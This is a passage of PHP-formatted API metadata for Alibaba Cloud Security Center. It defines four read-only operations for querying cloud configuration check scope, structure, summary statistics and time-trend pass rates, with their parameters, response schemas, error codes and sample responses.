'GetCheckScopeConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119340', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the configuration. This parameter is optional. If you do not specify this parameter, a default ID is generated.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '435f626256ebf564cf5ba966a539****', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'GetCheckScopeConfigResponse', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['description' => 'The creation time.', 'type' => 'string', 'example' => '2022-10-16 18:17:16', 'title' => ''], 'GmtModified' => ['description' => 'The modification time.', 'type' => 'string', 'example' => '2026-01-09 10:19:57', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the configuration.', 'type' => 'string', 'example' => '97a1fed216908e417407344e1505xxxx', 'title' => ''], 'Type' => ['description' => 'The scan scope configuration type. Valid values:'."\n" .'- **1**: scan by instance'."\n" .'- **3**: scan all', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AutoType' => ['description' => 'The automatic scan configuration type. Valid values:'."\n" .'- **0**: automatic scanning is disabled'."\n" .'- **1**: automatically scan newly added cloud assets', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AutoConfig' => ['description' => 'The automatic scan configuration as a JSON string. The following fields are included:'."\n" ."\n" .'- **autoInclude**: specifies whether to enable automatic scanning. Valid values: **true**: enabled. **false**: disabled.'."\n" .'- **autoRule**: the enablement configuration.'."\n" .'- **ruleOperator**: the enablement configuration rule. The value is **include**.'."\n" .'- **operator**: the logical operator. The value is **or**.'."\n" .'- **rule**: the rule.'."\n" .'- **condition**: the rule condition. Valid values: **vendor**: vendor. **assetType**: level-1 asset type. **assetSubType**: level-2 asset type.'."\n" .'> For more information, see the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation.', 'type' => 'string', 'example' => '"{\\"autoInclude\\":true,\\"autoRule\\":{\\"ruleOperator\\":\\"include\\",\\"operator\\":\\"or\\",\\"rule\\":[{\\"condition\\":\\"assetSubType\\",\\"ruleOperator\\":\\"include\\",\\"value\\":[{\\"vendor\\":\\"0\\",\\"assetType\\":\\"0\\",\\"assetSubType\\":\\"100\\"}]}]}}"', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query check scope configuration', 'summary' => 'Queries the check scope configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Data\\": {\\n \\"GmtCreate\\": \\"2022-10-16 18:17:16\\",\\n \\"GmtModified\\": \\"2026-01-09 10:19:57\\",\\n \\"ConfigId\\": \\"97a1fed216908e417407344e1505xxxx\\",\\n \\"Type\\": 1,\\n \\"AutoType\\": 1,\\n \\"AutoConfig\\": \\"\\\\\\"{\\\\\\\\\\\\\\"autoInclude\\\\\\\\\\\\\\":true,\\\\\\\\\\\\\\"autoRule\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"ruleOperator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"include\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"operator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"or\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"rule\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"condition\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"assetSubType\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ruleOperator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"include\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"vendor\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"assetType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"assetSubType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"100\\\\\\\\\\\\\\"}]}]}}\\\\\\"\\"\\n }\\n}","type":"json"}]', ], 'GetCheckStructure' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region where the asset resides. Valid values:'."\n" ."\n" .'- cn-hangzhou: China'."\n" .'- ap-southeast-1: outside China.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of task sources.', 'type' => 'array', 'items' => ['description' => 'The task source. Valid values:'."\n" ."\n" .'- **YAO_CHI**: ApsaraDB.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'LGetCheckStructureResponse', 'type' => 'object', 'properties' => [ 'CheckStructureResponse' => [ 'description' => 'The structure information of cloud platform configuration check items.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'StandardType' => ['description' => 'The business type of the cloud platform configuration check item. Valid values:'."\n" ."\n" .'- RISK: security risk'."\n" ."\n" .'- IDENTITY_PERMISSION: permission management CIEM'."\n" ."\n" .'- COMPLIANCE: security compliance.', 'type' => 'string', 'example' => 'RISK', 'title' => ''], 'Standards' => [ 'description' => 'The structure information of check items under the business type.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Requirements' => [ 'description' => 'The standards of the cloud platform configuration check items.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the cloud platform configuration check item requirement.', 'type' => 'integer', 'format' => 'int64', 'example' => '46', 'title' => ''], 'ShowName' => ['description' => 'The name of the cloud platform configuration check item requirement.', 'type' => 'string', 'example' => 'Networking', 'title' => ''], 'TotalCheckCount' => ['description' => 'The total number of check items under the requirement.', 'type' => 'integer', 'format' => 'int32', 'example' => '36', 'title' => ''], 'Sections' => [ 'description' => 'The sections of the check items.', 'type' => 'array', 'items' => [ 'description' => 'The ID of the check item section.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the check item section.', 'type' => 'integer', 'format' => 'int64', 'example' => '177', 'title' => ''], 'ShowName' => ['description' => 'The name of the check item section.', 'type' => 'string', 'example' => 'Access Control', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Id' => ['description' => 'The ID of the cloud platform configuration check item standard.', 'type' => 'integer', 'format' => 'int64', 'example' => '8', 'title' => ''], 'Type' => ['description' => 'The business type corresponding to the cloud platform configuration check item standard. Valid values:'."\n" .'- RISK: security risk'."\n" ."\n" .'- IDENTITY_PERMISSION: permission management CIEM'."\n" ."\n" .'- COMPLIANCE: security compliance.', 'type' => 'string', 'example' => 'IDENTITY_PERMISSION', 'title' => ''], 'ShowName' => ['description' => 'The name of the cloud platform configuration check item standard.', 'type' => 'string', 'example' => 'Alibaba Cloud best security practices', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '379a9b8f-107b-4630-9e95-2299a1ea****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Get cloud platform configuration check item structure', 'summary' => 'Queries the directory structure of the check item list.', 'description' => 'The cloud platform configuration check feature requires a purchase before use.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckStructure'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckStructure', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CheckStructureResponse\\": [\\n {\\n \\"StandardType\\": \\"RISK\\",\\n \\"Standards\\": [\\n {\\n \\"Requirements\\": [\\n {\\n \\"Id\\": 46,\\n \\"ShowName\\": \\"Networking\\",\\n \\"TotalCheckCount\\": 36,\\n \\"Sections\\": [\\n {\\n \\"Id\\": 177,\\n \\"ShowName\\": \\"Access Control\\"\\n }\\n ]\\n }\\n ],\\n \\"Id\\": 8,\\n \\"Type\\": \\"IDENTITY_PERMISSION\\",\\n \\"ShowName\\": \\"Alibaba Cloud best security practices\\"\\n }\\n ]\\n }\\n ],\\n \\"RequestId\\": \\"379a9b8f-107b-4630-9e95-2299a1ea****\\"\\n}","type":"json"}]', ], 'GetCheckSummary' => [ 'summary' => 'Retrieves the overview of cloud platform configuration checks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses.'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member accounts in the resource directory.'."\n" .'>Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '000', 'title' => ''], ], [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud service providers.', 'type' => 'array', 'items' => ['description' => 'The cloud service provider. Valid values:'."\n" ."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **TENCENT**: Tencent Cloud'."\n" .'- **AWS**: Amazon Web Services'."\n" .'- **HUAWEICLOUD**: Huawei Cloud'."\n" .'- **MICROSOFT**: Microsoft Azure.', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'IsItemStatistic', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to return check item statistics information, including the number of check items published by the system and the number of check items currently owned by the user. Default value: **false**. Valid values:'."\n" .'- **true**: Returns the statistics information.'."\n" .'- **false**: Does not return the statistics information.', 'type' => 'boolean', 'required' => false, 'example' => 'false'], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of task sources.', 'type' => 'array', 'items' => ['description' => 'The task source. Valid values:'."\n" .'- **YAO_CHI**: ApsaraDB console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'Summarys' => [ 'description' => 'The overview results.', 'type' => 'array', 'items' => [ 'description' => 'The individual result item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The check item type. Valid values:'."\n" ."\n" .'- **COMPLIANCE**: Compliance.'."\n" .'- **RISK**: Security risk.'."\n" .'- **IDENTITY_PERMISSION**: Identity and access management.', 'type' => 'string', 'example' => 'IDENTITY_PERMISSION', 'title' => ''], 'PassCount' => ['description' => 'The number of check items that passed the check.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'FailCount' => ['description' => 'The number of risk items detected.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'Standards' => [ 'description' => 'The standard output of check items.', 'type' => 'array', 'items' => [ 'description' => 'The standard output of check items.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The check item ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'ShowName' => ['description' => 'The check item name.', 'type' => 'string', 'example' => '身份权限管理', 'title' => ''], 'PassCount' => ['description' => 'The number of check items that passed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'FailCount' => ['description' => 'The number of check items that failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskLevelHighCount' => ['description' => 'The number of check items with a **high** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskLevelMediumCount' => ['description' => 'The number of check items with a **medium** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskLevelLowCount' => ['description' => 'The number of check items with a **low** risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'StandardStatistic' => [ 'description' => 'The risk statistics information for the standard.', 'type' => 'object', 'properties' => [ 'PassCount' => ['description' => 'The number of check items that passed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PassLowCount' => ['description' => 'The number of passed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassMediumCount' => ['description' => 'The number of passed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassHighCount' => ['description' => 'The number of passed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassCount' => ['description' => 'The number of check items that failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotPassLowCount' => ['description' => 'The number of failed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassMediumCount' => ['description' => 'The number of failed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassHighCount' => ['description' => 'The number of failed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckCount' => ['description' => 'The number of unchecked check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotCheckLowCount' => ['description' => 'The number of unchecked check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckMediumCount' => ['description' => 'The number of unchecked check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckHighCount' => ['description' => 'The number of unchecked check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'TypeStatistic' => [ 'description' => 'The risk statistics information for the risk category.', 'type' => 'object', 'properties' => [ 'PassCount' => ['description' => 'The number of check items that passed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PassLowCount' => ['description' => 'The number of passed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassMediumCount' => ['description' => 'The number of passed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassHighCount' => ['description' => 'The number of passed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassCount' => ['description' => 'The number of check items that failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotPassLowCount' => ['description' => 'The number of failed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassMediumCount' => ['description' => 'The number of failed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassHighCount' => ['description' => 'The number of failed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckCount' => ['description' => 'The number of unchecked check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotCheckLowCount' => ['description' => 'The number of unchecked check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckMediumCount' => ['description' => 'The number of unchecked check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckHighCount' => ['description' => 'The number of unchecked check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'OverallStatistic' => [ 'description' => 'The overall risk statistics information.', 'type' => 'object', 'properties' => [ 'PassCount' => ['description' => 'The number of check items that passed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PassLowCount' => ['description' => 'The number of passed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassMediumCount' => ['description' => 'The number of passed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PassHighCount' => ['description' => 'The number of passed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassCount' => ['description' => 'The number of check items that failed.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotPassLowCount' => ['description' => 'The number of failed check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassMediumCount' => ['description' => 'The number of failed check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotPassHighCount' => ['description' => 'The number of failed check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckCount' => ['description' => 'The number of unchecked check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'NotCheckLowCount' => ['description' => 'The number of unchecked check items with a low risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckMediumCount' => ['description' => 'The number of unchecked check items with a medium risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NotCheckHighCount' => ['description' => 'The number of unchecked check items with a high risk level.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '843E4805-****-7EE12FA8DBFD', 'title' => ''], 'OverallItemStatistic' => [ 'description' => 'The statistics information related to the number of check items.', 'type' => 'object', 'properties' => [ 'ResultCount' => ['title' => '', 'description' => 'The number of check items currently owned by the user.', 'type' => 'integer', 'format' => 'int32', 'example' => '25'], 'ReleaseCount' => ['title' => '', 'description' => 'The number of check items published by the system.', 'type' => 'integer', 'format' => 'int32', 'example' => '620'], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve cloud platform configuration check overview', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Summarys\\": [\\n {\\n \\"Type\\": \\"IDENTITY_PERMISSION\\",\\n \\"PassCount\\": 10,\\n \\"FailCount\\": 5,\\n \\"Standards\\": [\\n {\\n \\"Id\\": 1,\\n \\"ShowName\\": \\"身份权限管理\\",\\n \\"PassCount\\": 1,\\n \\"FailCount\\": 1,\\n \\"RiskLevelHighCount\\": 1,\\n \\"RiskLevelMediumCount\\": 1,\\n \\"RiskLevelLowCount\\": 1,\\n \\"StandardStatistic\\": {\\n \\"PassCount\\": 3,\\n \\"PassLowCount\\": 1,\\n \\"PassMediumCount\\": 1,\\n \\"PassHighCount\\": 1,\\n \\"NotPassCount\\": 3,\\n \\"NotPassLowCount\\": 1,\\n \\"NotPassMediumCount\\": 1,\\n \\"NotPassHighCount\\": 1,\\n \\"NotCheckCount\\": 3,\\n \\"NotCheckLowCount\\": 1,\\n \\"NotCheckMediumCount\\": 1,\\n \\"NotCheckHighCount\\": 1\\n }\\n }\\n ],\\n \\"TypeStatistic\\": {\\n \\"PassCount\\": 3,\\n \\"PassLowCount\\": 1,\\n \\"PassMediumCount\\": 1,\\n \\"PassHighCount\\": 1,\\n \\"NotPassCount\\": 3,\\n \\"NotPassLowCount\\": 1,\\n \\"NotPassMediumCount\\": 1,\\n \\"NotPassHighCount\\": 1,\\n \\"NotCheckCount\\": 3,\\n \\"NotCheckLowCount\\": 1,\\n \\"NotCheckMediumCount\\": 1,\\n \\"NotCheckHighCount\\": 1\\n }\\n }\\n ],\\n \\"OverallStatistic\\": {\\n \\"PassCount\\": 3,\\n \\"PassLowCount\\": 1,\\n \\"PassMediumCount\\": 1,\\n \\"PassHighCount\\": 1,\\n \\"NotPassCount\\": 3,\\n \\"NotPassLowCount\\": 1,\\n \\"NotPassMediumCount\\": 1,\\n \\"NotPassHighCount\\": 1,\\n \\"NotCheckCount\\": 3,\\n \\"NotCheckLowCount\\": 1,\\n \\"NotCheckMediumCount\\": 1,\\n \\"NotCheckHighCount\\": 1\\n },\\n \\"RequestId\\": \\"843E4805-****-7EE12FA8DBFD\\",\\n \\"OverallItemStatistic\\": {\\n \\"ResultCount\\": 25,\\n \\"ReleaseCount\\": 620\\n }\\n}","type":"json"}]', ], 'GetCheckTimeDimensionStatistic' => [ 'summary' => 'Retrieves the time trend pass rate statistics for Cloud Security Posture Management (CSPM) risk items.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '203873', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Vendors', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud service providers.', 'type' => 'array', 'items' => ['description' => 'The cloud service provider. Valid values:'."\n" .'- **ALIYUN**: Alibaba Cloud'."\n" .'- **TENCENT**: Tencent Cloud'."\n" .'- **MICROSOFT**: Azure'."\n" .'- **AWS**: Amazon Web Services (AWS).', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StatisticType', 'in' => 'query', 'schema' => ['description' => 'The type of data statistics. Valid values:'."\n" .'- **CheckPassRate**: Check item pass rate.'."\n" .'- **AssetPassRate**: Asset pass rate.', 'type' => 'string', 'required' => false, 'example' => 'AssetPassRate', 'title' => ''], ], [ 'name' => 'StartTimeStamp', 'in' => 'query', 'schema' => ['description' => 'The start time in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1672385044000', 'title' => ''], ], [ 'name' => 'EndTimeStamp', 'in' => 'query', 'schema' => ['description' => 'The end time in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1672285044000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6B****', 'title' => ''], 'TimeDimensionStatisticDTO' => [ 'description' => 'The list of time trend statistics results.', 'type' => 'object', 'properties' => [ 'TimeDimensionStatisticItems' => [ 'description' => 'The time trend statistics results.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'DataTime' => ['description' => 'The data timestamp in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'example' => '1712592000000', 'title' => ''], 'StatisticDatas' => [ 'description' => 'The list of statistics data.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The data type.', 'type' => 'string', 'example' => 'COMPLIANCE_Pass', 'title' => ''], 'Value' => ['description' => 'The quantity.', 'type' => 'integer', 'format' => 'int32', 'example' => '194', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'StatisticType' => ['description' => 'The type of data statistics. Valid values:'."\n" .'- **CheckPassRate**: Check item pass rate.'."\n" .'- **AssetPassRate**: Asset pass rate.', 'type' => 'string', 'example' => 'CheckPassRate', 'title' => ''], 'Dates' => [ 'description' => 'The list of data timestamps.', 'type' => 'array', 'items' => ['description' => 'The time point in timestamp format.', 'type' => 'integer', 'format' => 'int64', 'example' => '[1712592000000]', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve time trend statistics for CSPM risk items', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckTimeDimensionStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetCheckCountStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": 